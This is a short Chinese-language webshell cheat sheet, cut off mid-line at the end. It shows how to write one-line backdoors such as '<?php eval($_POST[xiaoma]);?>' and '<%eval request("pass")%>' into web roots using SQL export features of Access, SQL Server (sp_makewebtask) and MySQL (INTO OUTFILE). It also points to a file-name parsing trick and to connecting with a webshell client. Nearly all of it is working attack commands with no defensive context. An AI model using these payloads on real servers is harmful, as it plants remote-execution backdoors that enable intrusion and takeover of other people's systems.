Access导出
Access可导出xxx等文件需要配合解析漏洞
create table cmd (a varchar(50));
insert into cmd (a) values ('一句话木马') #一句话木马如:<%execute request(1)%>
select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd
drop table cmd
菜刀直连https://www.xxx.com/1.asa;x.xls
Sqlserver导出
exec sp_makewebtask 'C:\test1.php','select "<%eval request("pass")%>" '--
Mysql导出
以phpMyAdmin为例
方式一
create TABLE xiaoma (xiaoma1 text NOT NULL);
insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma]);?>');
select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';
drop TABLE IF EXISTS xiaoma;
方法二
select "<?php eval($_POST[v01cano]);?>" into outfile 'D:/phpstudy/www/